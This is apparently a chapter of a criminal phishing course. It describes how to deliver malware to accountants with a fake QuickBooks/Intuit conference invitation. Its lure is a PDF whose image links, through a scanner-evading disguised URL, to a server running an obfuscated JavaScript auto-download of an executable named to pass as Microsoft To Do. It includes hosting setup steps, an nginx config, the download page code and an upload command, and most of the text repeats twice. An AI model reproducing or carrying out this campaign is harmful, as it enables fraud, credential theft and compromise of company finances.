This chapter will open gateway to other subsequent chapters. We will be targeting Certified Public Accountants who are responsible for management of quickbooks accounts and payments of employees in a law/tax firm, cpas can be found in almost every corporation in the world.
Which makes targeting them provide various benefits including access to corporate network,quickbooks and otherr paymeent distribution softwares and based on recent attacks performed by the team, these cpas have bank account logins saved on their chrome profiles which rquire a step away from 2fa bypass because at the same time their email accounts and other social media accounts are logged in the same profile or a different profile a few clicks away from account center.
Although it sounds all sweet and warm but attacking such people can be difficult because there are regular account alerrts notifying these cpas of potential spams, some companies go to the extent of sending out a reminder every 3 days to keep these cpas on alert because they have access to either half or all the companies spending budget for the month and a company's budget can range from $30,000 - $2M+ respectively based on the size and revenue of the specific company, with these constant reminders some company's who have fallen victim to spam attacks or ransomware attacks issue a weekly specialised spam themselves, yes. There are companies which provide this kind of service of targeting your company with actual spam attacks and when an employee falls victim they add them to a list and after end of attack contact each of the listed employees who fell victim to notify them about the whole thing being a test and sometimes rewarding workers who passed the tests an additional percentage of salary.
So with this layed out the whole thing looks more difficult right? But no we will not be sending attacks which look like an actual spam besides what percentage of corporate employees do not have social media and do not like gossiping about other workers or their partners? almost all employees including men but wait after gossiping and social media various hours a week what do they do after this matrix of media posting and reacting to post?
They would like to relax their bodies because their work stresses them out with cpas as prime examples they sit,desktop and documents,get up,print print print, sit,get lunch repeat. And lets be real they hate themselves and hate most of the emails they get so how do we exploit these people? yeah i think you're blind because you just read past one exploit. Thus "sit,desktop and documents,get up,print print print,sit,get lunch repeat", yes we hit them with the last->first.
Which is after getting lunch, now lets be honest right now who would dress up in a suit sit for hours get annoying calls from co-workers and finally get time for some food and right after eating they get straight to serious mode, no. at this time you already had some joy just by eating lunch even if you do not like the lunch its still food right, now when you're done you will feel a little relaxed and somewhat dizzy like how you just want to take a nap after a great meal, although don't do that its not advisable you will get fat as fuck. Now within this time is mostly between 12:30PM - 1:30PM this is the time we hit them with the attack because they are already back to sit behind their desktop and a little fatigue has kicked in so they're just relaxing and boom, we hit them with the attack.
Now one may ask what attack exactly because even if they are fatigued and relax they can still see a spam with plain eyes right? Well yes but we won't be sending a 'Heyya, you won an iphone 17promax using your company's program for employees enroll now to receive your iphone' or 'Your microsoft account password is about to expire, click the link below to reset your account password' NO, this is 2025 you still think even an old worker would fall for this? maybe but only if they work for a corporation which has $20,000 annual income. The probability of the corp we are targetting having multi million/billion dollar annual revenue. So we will not be using such an old trick rather a global conference invite yes, this isn't a completely never before seen conference because this is a real conference which will be happening this october so we hit them right on the dot with an email crafted with the real conference date and everything.
But that's not all, not everyone likes conferences because they mostly have a busy schedule and even though it sounds nice what about the plane ticket, accomodation, food and all that right? But no the mailing letter will explitly state the accomodation, food and plane tickets have been covered by the same accounting software provider they use which is Quickbooks and its flight partner for the even TravelMaster, with this there is a 95% success rate and what makes this better is the mailing letter will not include suspicious or fake links.
All the links inside the letter will be legitimate and actual quickbooks domain. So how do we get the results then right? We will add a pdf attachment which lets them fill the form to accept the invitation to the conference but not a direct form with fields because that is bound to not pass detections in business mail accounts by microsoft and its subsidiaries so we rather embed an image which will make the pdf look more legitimate but will not look like its really a fake image and to get their complete trust we will be embedding a Microsoft ToDo Software download image crafted as an Accept Invitation which will boost their trust they will be actually scheduling the conference with a software they already use for their meetings and schedules right, but we will embed the download link to our malware on the click of this crafted image but remember this is business attack there are multiple bots and spam filters to bypass the spam filter we will be using a google openredirect exploit to make the main link be the legitimate google domain but on redirect will be to our malware download and we do not need to create an additional landing page for our malware because the image in the pdf already states accept invitation with Microsoft ToDo and the link will have a php auto download script which will trigger our malware download directly after click and the percentage of the worker running the downloaded malware is 99% because the downloaded malware executable will not be labeled "MyMalware" no, the name should match the original Microsoft ToDo application name to bypass chrome alert as well because remember we're trying to ride in plain site and everything needs to be inch perfect, a single mistake and your project is gone. This is the end of the seed, now enjoy the fruit.
DEPLOYMENT PHASE 1
Register an account on hostcay.com and buy a domain name with a .eu or .com tld
Register an account on luxhost.cc and purchase a windows/linux vps the system specification of the server does not matter
Next signup for an account on cloudflare and connect the domain to the clouudflare account uisng the nameserver instructions provided by cloudflare.
sudo apt update;apt upgrade;apt install nginx
After domain is linked to cloudflare login to the purchased vps and run the command below to install the needed software for operation, in this manual we will be using nginx as default web host.
after nginx is installed edit the configuration for /sites-enabled/default by runni ng the command below to open the nano terminal based editor.
nano /etc/nginx/sites-enabled/default
after the file is open in nano terminal based editor, move to the bottom of file and paste this block
Replace domain with the domain you linked to the vps (without http:// or https://) then press CTRL+O and ENTER to wrrite the changes then CTRL+X to exit the commandline editor Afterwards cd into the /var/www/html directory and create new file using the command below
touch index.htm
then open the file just like we opened the nginx file and paste the code below into it
replace the filen with the name of your exe stub. Next we will upload our stub to the host using sftp, if your stub is in your downloads folder on your system this is the command we will use
sftp stub.exe root@ip:port:/var/www/html
replace the stub.exe with original stub name and ip:port with the vps' ip and port, this command will ask forr tehee vps password when provided will upload the stub to the host and now the host auto download without detection will be activated.
DEPLOYMENT PHASE 2
Its time to set mailing system and i know most of you have a problem with mailing as a result we made PinkGateway an hwid based mailer which sends without the need to buy smtps or consoles. But we will not be discussing pinkgateway in 1.0 since its trial credits will be available in 2.0. Now the mailing letter we will be using is a specially generated Intuit conference invitation as seen in figure below
As indicated in the seed stage, the letter has not buttons or requires clicks and the mailing letter will include the intuiit1.pdf which is available in Downloads section of your dashboard. With a title matching the theme, you can make the pdf auto download our stub from our server with single click by hyperlinking the image to our site url but not raw but with a legitimate leading domain
such as "https://ask.com;@www.ourdomain.org#&hl=en-us&gl=dk/"
This will create an indirect open redirect skipping scanners because our domain is embedded inbetween the chars and non detectable unless there is a click which will be performed by our target and not scanners
Now we will embed this link inside the pdf document's image using LibreOffice which is freely available for download through the web or inside the Downloads section of this portal
After download we open the pdf in LibreOffice and click on the image and select the hyperlink and place our link inside and see the Title to Microsoft To Do
After we're done with this we save our document and continue with sendout, i will not be covering the means of sendout because i will be using pinkgateway and pinkgateway is not included in thiis version.
Note: Subject: IntuitConnect25 Invitation From Name: the name specified in the closing signature of mailing body, this makes everything legit and prevent spam filters from blocking using known names
you should receive feedbacks in clicks and victims as seen in figure below if all is well.
Write to support if you need additional questions attended to. See you in next chapter
Другие версии: https://privatemilitarycompany.com
Which makes targeting them provide various benefits including access to corporate network,quickbooks and otherr paymeent distribution softwares and based on recent attacks performed by the team, these cpas have bank account logins saved on their chrome profiles which rquire a step away from 2fa bypass because at the same time their email accounts and other social media accounts are logged in the same profile or a different profile a few clicks away from account center.
Although it sounds all sweet and warm but attacking such people can be difficult because there are regular account alerrts notifying these cpas of potential spams, some companies go to the extent of sending out a reminder every 3 days to keep these cpas on alert because they have access to either half or all the companies spending budget for the month and a company's budget can range from $30,000 - $2M+ respectively based on the size and revenue of the specific company, with these constant reminders some company's who have fallen victim to spam attacks or ransomware attacks issue a weekly specialised spam themselves, yes. There are companies which provide this kind of service of targeting your company with actual spam attacks and when an employee falls victim they add them to a list and after end of attack contact each of the listed employees who fell victim to notify them about the whole thing being a test and sometimes rewarding workers who passed the tests an additional percentage of salary.
So with this layed out the whole thing looks more difficult right? But no we will not be sending attacks which look like an actual spam besides what percentage of corporate employees do not have social media and do not like gossiping about other workers or their partners? almost all employees including men but wait after gossiping and social media various hours a week what do they do after this matrix of media posting and reacting to post?
They would like to relax their bodies because their work stresses them out with cpas as prime examples they sit,desktop and documents,get up,print print print, sit,get lunch repeat. And lets be real they hate themselves and hate most of the emails they get so how do we exploit these people? yeah i think you're blind because you just read past one exploit. Thus "sit,desktop and documents,get up,print print print,sit,get lunch repeat", yes we hit them with the last->first.
Which is after getting lunch, now lets be honest right now who would dress up in a suit sit for hours get annoying calls from co-workers and finally get time for some food and right after eating they get straight to serious mode, no. at this time you already had some joy just by eating lunch even if you do not like the lunch its still food right, now when you're done you will feel a little relaxed and somewhat dizzy like how you just want to take a nap after a great meal, although don't do that its not advisable you will get fat as fuck. Now within this time is mostly between 12:30PM - 1:30PM this is the time we hit them with the attack because they are already back to sit behind their desktop and a little fatigue has kicked in so they're just relaxing and boom, we hit them with the attack.
Now one may ask what attack exactly because even if they are fatigued and relax they can still see a spam with plain eyes right? Well yes but we won't be sending a 'Heyya, you won an iphone 17promax using your company's program for employees enroll now to receive your iphone' or 'Your microsoft account password is about to expire, click the link below to reset your account password' NO, this is 2025 you still think even an old worker would fall for this? maybe but only if they work for a corporation which has $20,000 annual income. The probability of the corp we are targetting having multi million/billion dollar annual revenue. So we will not be using such an old trick rather a global conference invite yes, this isn't a completely never before seen conference because this is a real conference which will be happening this october so we hit them right on the dot with an email crafted with the real conference date and everything.
But that's not all, not everyone likes conferences because they mostly have a busy schedule and even though it sounds nice what about the plane ticket, accomodation, food and all that right? But no the mailing letter will explitly state the accomodation, food and plane tickets have been covered by the same accounting software provider they use which is Quickbooks and its flight partner for the even TravelMaster, with this there is a 95% success rate and what makes this better is the mailing letter will not include suspicious or fake links.
All the links inside the letter will be legitimate and actual quickbooks domain. So how do we get the results then right? We will add a pdf attachment which lets them fill the form to accept the invitation to the conference but not a direct form with fields because that is bound to not pass detections in business mail accounts by microsoft and its subsidiaries so we rather embed an image which will make the pdf look more legitimate but will not look like its really a fake image and to get their complete trust we will be embedding a Microsoft ToDo Software download image crafted as an Accept Invitation which will boost their trust they will be actually scheduling the conference with a software they already use for their meetings and schedules right, but we will embed the download link to our malware on the click of this crafted image but remember this is business attack there are multiple bots and spam filters to bypass the spam filter we will be using a google openredirect exploit to make the main link be the legitimate google domain but on redirect will be to our malware download and we do not need to create an additional landing page for our malware because the image in the pdf already states accept invitation with Microsoft ToDo and the link will have a php auto download script which will trigger our malware download directly after click and the percentage of the worker running the downloaded malware is 99% because the downloaded malware executable will not be labeled "MyMalware" no, the name should match the original Microsoft ToDo application name to bypass chrome alert as well because remember we're trying to ride in plain site and everything needs to be inch perfect, a single mistake and your project is gone. This is the end of the seed, now enjoy the fruit.
DEPLOYMENT PHASE 1
Register an account on hostcay.com and buy a domain name with a .eu or .com tld
Register an account on luxhost.cc and purchase a windows/linux vps the system specification of the server does not matter
Next signup for an account on cloudflare and connect the domain to the clouudflare account uisng the nameserver instructions provided by cloudflare.
sudo apt update;apt upgrade;apt install nginx
After domain is linked to cloudflare login to the purchased vps and run the command below to install the needed software for operation, in this manual we will be using nginx as default web host.
after nginx is installed edit the configuration for /sites-enabled/default by runni ng the command below to open the nano terminal based editor.
nano /etc/nginx/sites-enabled/default
after the file is open in nano terminal based editor, move to the bottom of file and paste this block
NGINX:
server {
server_name domain;
root /var/www/html;
index index.php index.html index.htm;
access_log /var/log/nginx/domain.access.log;
error_log /var/log/nginx/domain.error.log;
location / {
try_files $uri $uri/ =404;
}
location ~ /\. {
deny all;
}
location ~* \.(css|js|png|jpg|jpeg|gif|svg|ico|woff2?)$ {
expires 30d;
add_header Cache-Control "public, no-transform";
}
}Replace domain with the domain you linked to the vps (without http:// or https://) then press CTRL+O and ENTER to wrrite the changes then CTRL+X to exit the commandline editor Afterwards cd into the /var/www/html directory and create new file using the command below
touch index.htm
then open the file just like we opened the nginx file and paste the code below into it
HTML:
<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head>
<body>
<script>
window.onload = function() {
const _0x1fff = 'filen';
const _0b0101 = document.createElement('a');
_0b0101.href = _0x1fff;
_0b0101.download = 'filename.exe';
document.body.appendChild(_0b0101);
_0b0101.click();
document.body.removeChild(_0b0101);
};
</script>
</body>
</html>sftp stub.exe root@ip:port:/var/www/html
replace the stub.exe with original stub name and ip:port with the vps' ip and port, this command will ask forr tehee vps password when provided will upload the stub to the host and now the host auto download without detection will be activated.
DEPLOYMENT PHASE 2
Its time to set mailing system and i know most of you have a problem with mailing as a result we made PinkGateway an hwid based mailer which sends without the need to buy smtps or consoles. But we will not be discussing pinkgateway in 1.0 since its trial credits will be available in 2.0. Now the mailing letter we will be using is a specially generated Intuit conference invitation as seen in figure below
As indicated in the seed stage, the letter has not buttons or requires clicks and the mailing letter will include the intuiit1.pdf which is available in Downloads section of your dashboard. With a title matching the theme, you can make the pdf auto download our stub from our server with single click by hyperlinking the image to our site url but not raw but with a legitimate leading domain
such as "https://ask.com;@www.ourdomain.org#&hl=en-us&gl=dk/"
This will create an indirect open redirect skipping scanners because our domain is embedded inbetween the chars and non detectable unless there is a click which will be performed by our target and not scanners
Now we will embed this link inside the pdf document's image using LibreOffice which is freely available for download through the web or inside the Downloads section of this portal
After download we open the pdf in LibreOffice and click on the image and select the hyperlink and place our link inside and see the Title to Microsoft To Do
After we're done with this we save our document and continue with sendout, i will not be covering the means of sendout because i will be using pinkgateway and pinkgateway is not included in thiis version.
Note: Subject: IntuitConnect25 Invitation From Name: the name specified in the closing signature of mailing body, this makes everything legit and prevent spam filters from blocking using known names
you should receive feedbacks in clicks and victims as seen in figure below if all is well.
Write to support if you need additional questions attended to. See you in next chapter
Другие версии: https://privatemilitarycompany.com